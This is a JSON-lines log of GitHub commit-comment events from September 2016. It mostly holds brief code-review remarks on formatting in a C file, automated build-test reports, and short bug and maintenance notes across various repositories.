{"id":"4543687971","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973015,"position":311,"line":311,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:18:15Z","updated_at":"2016-09-10T08:18:15Z","body":"no need for new line"}},"created_at":"2016-09-10T08:18:15Z"}
{"id":"4543688124","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973016,"position":314,"line":314,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:18:23Z","updated_at":"2016-09-10T08:18:23Z","body":"same"}},"created_at":"2016-09-10T08:18:23Z"}
{"id":"4543688746","type":"CommitCommentEvent","actor":{"login":"Donggeok"},"repo":{"name":"Donggeok/My-repository"},"payload":{"comment":{"id":18973017,"position":null,"line":null,"path":null,"commit_id":"4039bd89c62ccabb2f0c3dc55c01f51a0bd78260","created_at":"2016-09-10T08:18:57Z","updated_at":"2016-09-10T08:18:57Z","body":"I firstly come here."}},"created_at":"2016-09-10T08:18:57Z"}
{"id":"4543689044","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973018,"position":317,"line":317,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:19:14Z","updated_at":"2016-09-10T08:19:14Z","body":"tabs"}},"created_at":"2016-09-10T08:19:14Z"}
{"id":"4543689318","type":"CommitCommentEvent","actor":{"login":"Donggeok"},"repo":{"name":"Donggeok/My-repository"},"payload":{"comment":{"id":18973019,"position":null,"line":null,"path":null,"commit_id":"4039bd89c62ccabb2f0c3dc55c01f51a0bd78260","created_at":"2016-09-10T08:19:27Z","updated_at":"2016-09-10T08:19:27Z","body":"Something wrong will be made."}},"created_at":"2016-09-10T08:19:27Z"}
{"id":"4543689431","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973020,"position":336,"line":336,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:19:32Z","updated_at":"2016-09-10T08:19:32Z","body":"reduce new line"}},"created_at":"2016-09-10T08:19:32Z"}
{"id":"4543690012","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973021,"position":380,"line":380,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:20:02Z","updated_at":"2016-09-10T08:20:02Z","body":"}  esle"}},"created_at":"2016-09-10T08:20:02Z"}
{"id":"4543691075","type":"CommitCommentEvent","actor":{"login":"chrpk"},"repo":{"name":"Soikin/ASP"},"payload":{"comment":{"id":18973023,"position":null,"line":null,"path":null,"commit_id":"518c3886956257822c9cbc3b0798e3cea87363f4","created_at":"2016-09-10T08:20:46Z","updated_at":"2016-09-10T08:20:46Z","body":"Nice job!"}},"created_at":"2016-09-10T08:20:46Z"}
{"id":"4543691123","type":"CommitCommentEvent","actor":{"login":"DarthAffe"},"repo":{"name":"DarthAffe/CUE.NET"},"payload":{"comment":{"id":18973024,"position":1,"line":1,"path":"Devices/Generic/Enums/CorsairLedId.cs","commit_id":"d9a3678b815380ea95f20323f094629a8d549b31","created_at":"2016-09-10T08:20:48Z","updated_at":"2016-09-10T08:20:48Z","body":"This file shouldn't be in this commit :("}},"created_at":"2016-09-10T08:20:48Z"}
{"id":"4543691200","type":"CommitCommentEvent","actor":{"login":"DarthAffe"},"repo":{"name":"DarthAffe/CUE.NET"},"payload":{"comment":{"id":18973026,"position":1,"line":1,"path":"Devices/Generic/PositionedCorsairLed.cs","commit_id":"d9a3678b815380ea95f20323f094629a8d549b31","created_at":"2016-09-10T08:20:53Z","updated_at":"2016-09-10T08:20:53Z","body":"This file shouldn't be in this commit :("}},"created_at":"2016-09-10T08:20:53Z"}
{"id":"4543691202","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973027,"position":398,"line":398,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:20:53Z","updated_at":"2016-09-10T08:20:53Z","body":"delete functions and row that you don't need"}},"created_at":"2016-09-10T08:20:53Z"}
{"id":"4543691384","type":"CommitCommentEvent","actor":{"login":"chrpk"},"repo":{"name":"Soikin/ASP"},"payload":{"comment":{"id":18973028,"position":null,"line":null,"path":null,"commit_id":"518c3886956257822c9cbc3b0798e3cea87363f4","created_at":"2016-09-10T08:21:03Z","updated_at":"2016-09-10T08:21:03Z","body":"АЗАЗ НАГОВНОКОДИЛ КАК КЕК"}},"created_at":"2016-09-10T08:21:03Z"}
{"id":"4543691547","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973029,"position":420,"line":420,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:21:10Z","updated_at":"2016-09-10T08:21:10Z","body":"spaces "}},"created_at":"2016-09-10T08:21:10Z"}
{"id":"4543691790","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973030,"position":451,"line":451,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:21:22Z","updated_at":"2016-09-10T08:21:22Z","body":"tab"}},"created_at":"2016-09-10T08:21:22Z"}
{"id":"4543692005","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973031,"position":437,"line":437,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:21:35Z","updated_at":"2016-09-10T08:21:35Z","body":"tab"}},"created_at":"2016-09-10T08:21:35Z"}
{"id":"4543692144","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973032,"position":433,"line":433,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:21:42Z","updated_at":"2016-09-10T08:21:42Z","body":"tab"}},"created_at":"2016-09-10T08:21:42Z"}
{"id":"4543692318","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973033,"position":430,"line":430,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:21:51Z","updated_at":"2016-09-10T08:21:51Z","body":"tab"}},"created_at":"2016-09-10T08:21:51Z"}
{"id":"4543692587","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973035,"position":447,"line":447,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:22:07Z","updated_at":"2016-09-10T08:22:07Z","body":"tab"}},"created_at":"2016-09-10T08:22:07Z"}
{"id":"4543692803","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973036,"position":458,"line":458,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:22:17Z","updated_at":"2016-09-10T08:22:17Z","body":"tab"}},"created_at":"2016-09-10T08:22:17Z"}
{"id":"4543693162","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973037,"position":460,"line":460,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:22:33Z","updated_at":"2016-09-10T08:22:33Z","body":"spaces"}},"created_at":"2016-09-10T08:22:33Z"}
{"id":"4543693660","type":"CommitCommentEvent","actor":{"login":"01micko"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18973038,"position":null,"line":null,"path":null,"commit_id":"e15e3d8fbbb1501364eda8f2d0a667c1a2a6c2f0","created_at":"2016-09-10T08:22:54Z","updated_at":"2016-09-10T08:22:54Z","body":"Of course this is only if latest mkwallpaper is installed."}},"created_at":"2016-09-10T08:22:54Z"}
{"id":"4543693665","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973039,"position":490,"line":490,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:22:55Z","updated_at":"2016-09-10T08:22:55Z","body":"new line"}},"created_at":"2016-09-10T08:22:55Z"}
{"id":"4543695181","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973040,"position":18,"line":18,"path":"poly.h","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:24:12Z","updated_at":"2016-09-10T08:24:12Z","body":"you have only one c file. you don't need to declarate this functions. "}},"created_at":"2016-09-10T08:24:12Z"}
{"id":"4543699718","type":"CommitCommentEvent","actor":{"login":"reboom"},"repo":{"name":"mosesyou/FirstBlood"},"payload":{"comment":{"id":18973041,"position":null,"line":null,"path":null,"commit_id":"6e826aac4c4959e1a0846d1d8216a37ac6e0bbbd","created_at":"2016-09-10T08:27:51Z","updated_at":"2016-09-10T08:27:51Z","body":"管他什么先刷个存在！"}},"created_at":"2016-09-10T08:27:51Z"}
{"id":"4543700329","type":"CommitCommentEvent","actor":{"login":"dushyants19"},"repo":{"name":"InfiniteFlightAirportEditing/Airports"},"payload":{"comment":{"id":18973044,"position":null,"line":null,"path":null,"commit_id":"ac9efddd484f19dd85f2111ecc66a2c84bf0c0fc","created_at":"2016-09-10T08:28:24Z","updated_at":"2016-09-10T08:28:24Z","body":"You know, we dont remove closed airports :) "}},"created_at":"2016-09-10T08:28:24Z"}
{"id":"4543701111","type":"CommitCommentEvent","actor":{"login":"dushyants19"},"repo":{"name":"InfiniteFlightAirportEditing/Airports"},"payload":{"comment":{"id":18973047,"position":null,"line":null,"path":null,"commit_id":"3e8d74b087a6b810bad2ceda8af83548186db228","created_at":"2016-09-10T08:29:03Z","updated_at":"2016-09-10T08:29:03Z","body":"Again,  why did you remove this? "}},"created_at":"2016-09-10T08:29:03Z"}
{"id":"4543701382","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18973048,"position":null,"line":null,"path":null,"commit_id":"ce38a20beac15dd001d28d4f00609beda91e7d4c","created_at":"2016-09-10T08:29:16Z","updated_at":"2016-09-10T08:29:16Z","body":"develop (Unknown) - Win64-Windows-7-VisualStudio-12: Tests Failed (1931 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ce38a20beac15dd001d28d4f00609beda91e7d4c-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ce38a20beac15dd001d28d4f00609beda91e7d4c-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-78.88%25-red.svg)</a> \n"}},"created_at":"2016-09-10T08:29:16Z"}
{"id":"4543701885","type":"CommitCommentEvent","actor":{"login":"snak3ater"},"repo":{"name":"BenzoRoms/vendor_huawei_angler"},"payload":{"comment":{"id":18973049,"position":null,"line":null,"path":null,"commit_id":"d027c103be73c2cf38932770cb4db82b5c696003","created_at":"2016-09-10T08:29:44Z","updated_at":"2016-09-10T08:29:44Z","body":"Missing GCS.apk in priv-app "}},"created_at":"2016-09-10T08:29:44Z"}
{"id":"4543704189","type":"CommitCommentEvent","actor":{"login":"SoapGentoo"},"repo":{"name":"dracwyrm/gentoo-ebuilds"},"payload":{"comment":{"id":18973053,"position":67,"line":60,"path":"app-misc/ddctool/ddctool-0.5.0.ebuild","commit_id":"71fbc08b22e3f1c857da6750d2ec8db0d8d6da67","created_at":"2016-09-10T08:31:38Z","updated_at":"2016-09-10T08:31:38Z","body":"just tack this on straight, no reason to define a pointless variable"}},"created_at":"2016-09-10T08:31:38Z"}
{"id":"4543704584","type":"CommitCommentEvent","actor":{"login":"504865348"},"repo":{"name":"504865348/learngit"},"payload":{"comment":{"id":18973054,"position":null,"line":null,"path":null,"commit_id":"d077099000b17f388696efa36916d02a8f3f8b3c","created_at":"2016-09-10T08:31:59Z","updated_at":"2016-09-10T08:31:59Z","body":"remote conflict test"}},"created_at":"2016-09-10T08:31:59Z"}
{"id":"4543704638","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18973055,"position":158,"line":127,"path":"js/product.js","commit_id":"312457e40ca4dcf3cccce9734f581fe189d75eab","created_at":"2016-09-10T08:32:03Z","updated_at":"2016-09-10T08:32:03Z","body":"```js\r\nvar DB = window.products.reduce(function(db, item) {\r\n   db[item.id] = item;\r\n   return db;\r\n}, {});\r\n```"}},"created_at":"2016-09-10T08:32:03Z"}
{"id":"4543704680","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18973056,"position":null,"line":null,"path":null,"commit_id":"7ea0fcabc09edb080255338881844d29cb901b2b","created_at":"2016-09-10T08:32:05Z","updated_at":"2016-09-10T08:32:05Z","body":"os_2_0_develop_linux (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7ea0fcabc09edb080255338881844d29cb901b2b-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7ea0fcabc09edb080255338881844d29cb901b2b-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-10T08:32:05Z"}
{"id":"4543705489","type":"CommitCommentEvent","actor":{"login":"rickynils"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18973058,"position":null,"line":null,"path":null,"commit_id":"dd98b6fb9f35544201ed66733af40ff822ba8c36","created_at":"2016-09-10T08:32:47Z","updated_at":"2016-09-10T08:32:47Z","body":"@cstrahan It depends on how you run LXC. In my case I use libvirt+lxc, and have some nix stuff for that here: https://github.com/imsl/nix-modules/blob/master/modules/libvirt.nix (my long-term plan is to get some of that into nixpkgs, or at least document it somewhat). I just added a new `<filesystem>` device in libvirt and added a plain `fileSystems.\"/run\"` mount in NixOS (with `neededForBoot = true`)"}},"created_at":"2016-09-10T08:32:47Z"}
{"id":"4543706527","type":"CommitCommentEvent","actor":{"login":"mosesyou"},"repo":{"name":"mosesyou/FirstBlood"},"payload":{"comment":{"id":18973059,"position":null,"line":null,"path":null,"commit_id":"6e826aac4c4959e1a0846d1d8216a37ac6e0bbbd","created_at":"2016-09-10T08:33:39Z","updated_at":"2016-09-10T08:33:39Z","body":"楼上撒笔"}},"created_at":"2016-09-10T08:33:39Z"}
{"id":"4543707445","type":"CommitCommentEvent","actor":{"login":"noldor"},"repo":{"name":"codeigniter-jp/codeigniter-jp.github.io"},"payload":{"comment":{"id":18973061,"position":null,"line":null,"path":null,"commit_id":"4e94e778cf9095885d50751517adfc6800ff5923","created_at":"2016-09-10T08:34:25Z","updated_at":"2016-09-10T08:34:25Z","body":"このcanonicalタグ意図として大丈夫でしょうか？\r\n・2系ドキュメントと3系ドキュメントが同じものであるという宣言\r\n・3系ドキュメントトップページだけを「正のページ」とするので、指定したページが検索インデックスから全部消滅する可能性あり"}},"created_at":"2016-09-10T08:34:25Z"}
{"id":"4543707658","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18973062,"position":null,"line":null,"path":null,"commit_id":"7ea0fcabc09edb080255338881844d29cb901b2b","created_at":"2016-09-10T08:34:35Z","updated_at":"2016-09-10T08:34:35Z","body":"os_2_0_develop_linux (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7ea0fcabc09edb080255338881844d29cb901b2b-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7ea0fcabc09edb080255338881844d29cb901b2b-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-10T08:34:35Z"}
{"id":"4543707802","type":"CommitCommentEvent","actor":{"login":"kingphard"},"repo":{"name":"kingphard/lccweb"},"payload":{"comment":{"id":18973064,"position":null,"line":null,"path":null,"commit_id":"64c91c011ce9d1ee07096b1fd4b02f05a9fea194","created_at":"2016-09-10T08:34:43Z","updated_at":"2016-09-10T08:34:43Z","body":"h"}},"created_at":"2016-09-10T08:34:43Z"}
{"id":"4543710519","type":"CommitCommentEvent","actor":{"login":"mydongistiny"},"repo":{"name":"BenzoRoms/vendor_huawei_angler"},"payload":{"comment":{"id":18973066,"position":null,"line":null,"path":null,"commit_id":"7eaeb6004fd89b375162cadad2fc2e0e27bdf5a5","created_at":"2016-09-10T08:37:03Z","updated_at":"2016-09-10T08:37:03Z","body":"I removed it for a reason, but I did forget two other apps and they're in there now. I force pushed so it erased your comment. Sorry. "}},"created_at":"2016-09-10T08:37:03Z"}
{"id":"4543711232","type":"CommitCommentEvent","actor":{"login":"SammysHP"},"repo":{"name":"cgeo/cgeo"},"payload":{"comment":{"id":18973067,"position":5,"line":6,"path":"main/res/values/changelog_master.xml","commit_id":"af4d4fbdd1ea550697362642e3132227a25e7b9e","created_at":"2016-09-10T08:37:39Z","updated_at":"2016-09-10T08:37:39Z","body":"Typo."}},"created_at":"2016-09-10T08:37:39Z"}
{"id":"4543711340","type":"CommitCommentEvent","actor":{"login":"Dragios"},"repo":{"name":"jroweboy/citra"},"payload":{"comment":{"id":18973069,"position":null,"line":null,"path":null,"commit_id":"856c19805e166e2dbf7c47a29179058aa40eae85","created_at":"2016-09-10T08:37:44Z","updated_at":"2016-09-10T08:37:44Z","body":"I get this error message when installing CitraSetup.exe\r\n![entry point not found](https://cloud.githubusercontent.com/assets/18496868/18409226/de89046a-7774-11e6-88ef-96f27e5e6d58.png)"}},"created_at":"2016-09-10T08:37:44Z"}
{"id":"4543711714","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18973071,"position":null,"line":null,"path":null,"commit_id":"b904bda76966fe839fe899f23320d7a75e02c5e2","created_at":"2016-09-10T08:38:03Z","updated_at":"2016-09-10T08:38:03Z","body":"cc @jruby/truffle "}},"created_at":"2016-09-10T08:38:03Z"}
{"id":"4543711992","type":"CommitCommentEvent","actor":{"login":"Dragios"},"repo":{"name":"jroweboy/citra"},"payload":{"comment":{"id":18973072,"position":null,"line":null,"path":null,"commit_id":"856c19805e166e2dbf7c47a29179058aa40eae85","created_at":"2016-09-10T08:38:19Z","updated_at":"2016-09-10T08:38:19Z","body":"And there is no icon created in desktop."}},"created_at":"2016-09-10T08:38:19Z"}
{"id":"4543717871","type":"CommitCommentEvent","actor":{"login":"stefan-kolb"},"repo":{"name":"stefan-kolb/rack-stream"},"payload":{"comment":{"id":18973079,"position":null,"line":null,"path":null,"commit_id":"4c3b2a6e64b5e2dc00828fcd662de258ef279f9f","created_at":"2016-09-10T08:43:18Z","updated_at":"2016-09-10T08:43:18Z","body":"Opened a PR but no hopes that this will be merged. https://github.com/intridea/rack-stream/pull/8"}},"created_at":"2016-09-10T08:43:18Z"}
{"id":"4543719753","type":"CommitCommentEvent","actor":{"login":"SuperAdam47"},"repo":{"name":"SuperAdam47/Genisys"},"payload":{"comment":{"id":18973081,"position":3,"line":2,"path":"src/pocketmine/lang/locale/tur.ini","commit_id":"5905a51a6aa8ee4b17ad72441eb657a0c1bb33a3","created_at":"2016-09-10T08:45:05Z","updated_at":"2016-09-10T08:45:05Z","body":"ABC"}},"created_at":"2016-09-10T08:45:05Z"}
{"id":"4543721325","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18973082,"position":19,"line":88,"path":"app.js","commit_id":"1a1f64fe951442b072694954cff1d318cc254181","created_at":"2016-09-10T08:46:26Z","updated_at":"2016-09-10T08:46:26Z","body":"Well, this is a hard-to-find bug.\r\n\r\n`require.resolve` does something _completely_ different from `path.resolve`. `require.resolve` only accepts one argument, so this is actually equivalent to\r\n\r\n     let configPath = require.resolve(__dirname);\r\n\r\nWhich is the path to `app.js`, not the path to `config/config.js` as intended."}},"created_at":"2016-09-10T08:46:26Z"}
{"id":"4543721805","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18973083,"position":19,"line":88,"path":"app.js","commit_id":"1a1f64fe951442b072694954cff1d318cc254181","created_at":"2016-09-10T08:46:55Z","updated_at":"2016-09-10T08:46:55Z","body":"@taylor1791, not blaming you, but I'm highlighting you so you know for if you ever do this sort of thing again."}},"created_at":"2016-09-10T08:46:55Z"}
{"id":"4543721840","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18973084,"position":null,"line":null,"path":null,"commit_id":"4414b864cf69edc7e142c96fdca53bfa898de539","created_at":"2016-09-10T08:46:56Z","updated_at":"2016-09-10T08:46:56Z","body":"Also see [Issue 89: Make VS2010 default sometime in 2016](http://github.com/weidai11/cryptopp/issues/89) at GitHub and [Make VS2010 default sometime in 2016?](http://groups.google.com/forum/#!topic/cryptopp-users/vCYAEj3OI8g) on the mailing list."}},"created_at":"2016-09-10T08:46:56Z"}
{"id":"4543724547","type":"CommitCommentEvent","actor":{"login":"antonefremov"},"repo":{"name":"antonefremov/ror-basics-course"},"payload":{"comment":{"id":18973086,"position":21,"line":21,"path":"Lesson_5/train.rb","commit_id":"7822ef02e4923559ad55c29e6ec0251cc378c68c","created_at":"2016-09-10T08:49:21Z","updated_at":"2016-09-10T08:49:21Z","body":"Да, получалось, что оба экземпляра добавлялись в переменную класса с одним и тем же ключом, а затем выбиралось только первое значение. Переделал так, чтобы нельзя было создать два поезда с одним и тем же номером.\r\n"}},"created_at":"2016-09-10T08:49:21Z"}
{"id":"4543725802","type":"CommitCommentEvent","actor":{"login":"olivertomic"},"repo":{"name":"olivertomic/hoggorm"},"payload":{"comment":{"id":18973090,"position":3,"line":2,"path":"README.md","commit_id":"ad5fedad295d55c5fbc55526c08e4e5bfa785fbc","created_at":"2016-09-10T08:50:30Z","updated_at":"2016-09-10T08:50:30Z","body":"hoggorm is a Python  package for exploratory multivariate statistics. It contains principal component analysis (PCA), principal component regression (PCR) and partial least squares regression (PLS1 and PLS2) for one ore multiple response variables in Y."}},"created_at":"2016-09-10T08:50:30Z"}
{"id":"4543726353","type":"CommitCommentEvent","actor":{"login":"antonefremov"},"repo":{"name":"antonefremov/ror-basics-course"},"payload":{"comment":{"id":18973092,"position":4,"line":4,"path":"Lesson_5/producer.rb","commit_id":"7822ef02e4923559ad55c29e6ec0251cc378c68c","created_at":"2016-09-10T08:51:00Z","updated_at":"2016-09-10T08:51:00Z","body":"Упростил до одного только attr_accessor. Что-то подозрительно просто получилось..."}},"created_at":"2016-09-10T08:51:00Z"}
{"id":"4543727682","type":"CommitCommentEvent","actor":{"login":"antonefremov"},"repo":{"name":"antonefremov/ror-basics-course"},"payload":{"comment":{"id":18973095,"position":10,"line":10,"path":"Lesson_5/train.rb","commit_id":"7822ef02e4923559ad55c29e6ec0251cc378c68c","created_at":"2016-09-10T08:52:20Z","updated_at":"2016-09-10T08:52:20Z","body":"Да, извиняюсь, какое-то прям затмение мозга произошло. Переделал."}},"created_at":"2016-09-10T08:52:20Z"}
{"id":"4543727900","type":"CommitCommentEvent","actor":{"login":"mydongistiny"},"repo":{"name":"BenzoRoms/vendor_huawei_angler"},"payload":{"comment":{"id":18973096,"position":null,"line":null,"path":null,"commit_id":"d027c103be73c2cf38932770cb4db82b5c696003","created_at":"2016-09-10T08:52:31Z","updated_at":"2016-09-10T08:52:31Z","body":"I removed it for a reason, but I forgot two other apks."}},"created_at":"2016-09-10T08:52:31Z"}
{"id":"4543731408","type":"CommitCommentEvent","actor":{"login":"xiaoxiaoqi1982"},"repo":{"name":"xiaoxiaoqi1982/ceshi"},"payload":{"comment":{"id":18973105,"position":null,"line":null,"path":null,"commit_id":"987171103893e505789ab806b76db1d73d8c5eba","created_at":"2016-09-10T08:55:52Z","updated_at":"2016-09-10T08:55:52Z","body":"[receive]\r\ndenyCurrentBranch = ignore"}},"created_at":"2016-09-10T08:55:52Z"}
{"id":"4543731875","type":"CommitCommentEvent","actor":{"login":"copyNdpaste"},"repo":{"name":"copyNdpaste/hihi"},"payload":{"comment":{"id":18973107,"position":null,"line":null,"path":null,"commit_id":"b132d420d284068c49964ee398263a01f4689384","created_at":"2016-09-10T08:56:18Z","updated_at":"2016-09-10T08:56:18Z","body":"cc"}},"created_at":"2016-09-10T08:56:18Z"}
{"id":"4543732313","type":"CommitCommentEvent","actor":{"login":"robelkebede44"},"repo":{"name":"mattermost/android"},"payload":{"comment":{"id":18973108,"position":null,"line":null,"path":null,"commit_id":"2a65e5a240a1c5088a6ea38130d683ab3c3153a0","created_at":"2016-09-10T08:56:43Z","updated_at":"2016-09-10T08:56:43Z","body":"these might affect the lowest version of android devices   im just kidding i signup today "}},"created_at":"2016-09-10T08:56:43Z"}
{"id":"4543735292","type":"CommitCommentEvent","actor":{"login":"matcracker"},"repo":{"name":"BigScary/GriefPrevention"},"payload":{"comment":{"id":18973111,"position":null,"line":null,"path":null,"commit_id":"9e1be73d46b99c59d1be54f14a09ee409e228c65","created_at":"2016-09-10T08:59:27Z","updated_at":"2016-09-10T08:59:27Z","body":"Don't work on version 15.2.2"}},"created_at":"2016-09-10T08:59:27Z"}
{"id":"4543735539","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18973112,"position":null,"line":null,"path":null,"commit_id":"894874fe75ce079ad57e9d5e19813193b129152d","created_at":"2016-09-10T08:59:40Z","updated_at":"2016-09-10T08:59:40Z","body":"General maintenance."}},"created_at":"2016-09-10T08:59:40Z"}
{"id":"4543738841","type":"CommitCommentEvent","actor":{"login":"kilrah"},"repo":{"name":"opentx/opentx"},"payload":{"comment":{"id":18973114,"position":null,"line":null,"path":null,"commit_id":"f131c79b87cbda16f240af9e342ab178fd6c6f28","created_at":"2016-09-10T09:02:19Z","updated_at":"2016-09-10T09:02:19Z","body":"Shouldn't we rather just not check for repeat delay in the case of the Adjust GVAR function? Is there a reason why we do? sounds you'd precisely want that particular function to run at each cycle..."}},"created_at":"2016-09-10T09:02:19Z"}
{"id":"4543739353","type":"CommitCommentEvent","actor":{"login":"clearkimura"},"repo":{"name":"clearkimura/Customizer"},"payload":{"comment":{"id":18973116,"position":null,"line":null,"path":null,"commit_id":"70d4ef9989519a739842ea0c0ce337297f628790","created_at":"2016-09-10T09:02:44Z","updated_at":"2016-09-10T09:02:44Z","body":"This was my initial attempt managing project source code on GitHub and made a duplicate commit to `master` branch instead of the created `pre412` branch."}},"created_at":"2016-09-10T09:02:44Z"}
{"id":"4543739623","type":"CommitCommentEvent","actor":{"login":"clearkimura"},"repo":{"name":"clearkimura/Customizer"},"payload":{"comment":{"id":18973117,"position":null,"line":null,"path":null,"commit_id":"7d95ef25ca3b59dc666f21e75d85186e50549f77","created_at":"2016-09-10T09:02:59Z","updated_at":"2016-09-10T09:02:59Z","body":"This was my initial attempt managing project source code on GitHub and made a duplicate commit to `master` branch instead of the created `pre412` branch."}},"created_at":"2016-09-10T09:02:59Z"}
{"id":"4543739823","type":"CommitCommentEvent","actor":{"login":"clearkimura"},"repo":{"name":"clearkimura/Customizer"},"payload":{"comment":{"id":18973118,"position":null,"line":null,"path":null,"commit_id":"181b47968a42423b61e0b872ab4e2872f244cd26","created_at":"2016-09-10T09:03:10Z","updated_at":"2016-09-10T09:03:10Z","body":"This was my initial attempt managing project source code on GitHub and made a duplicate commit to `master` branch instead of the created `pre412` branch."}},"created_at":"2016-09-10T09:03:10Z"}
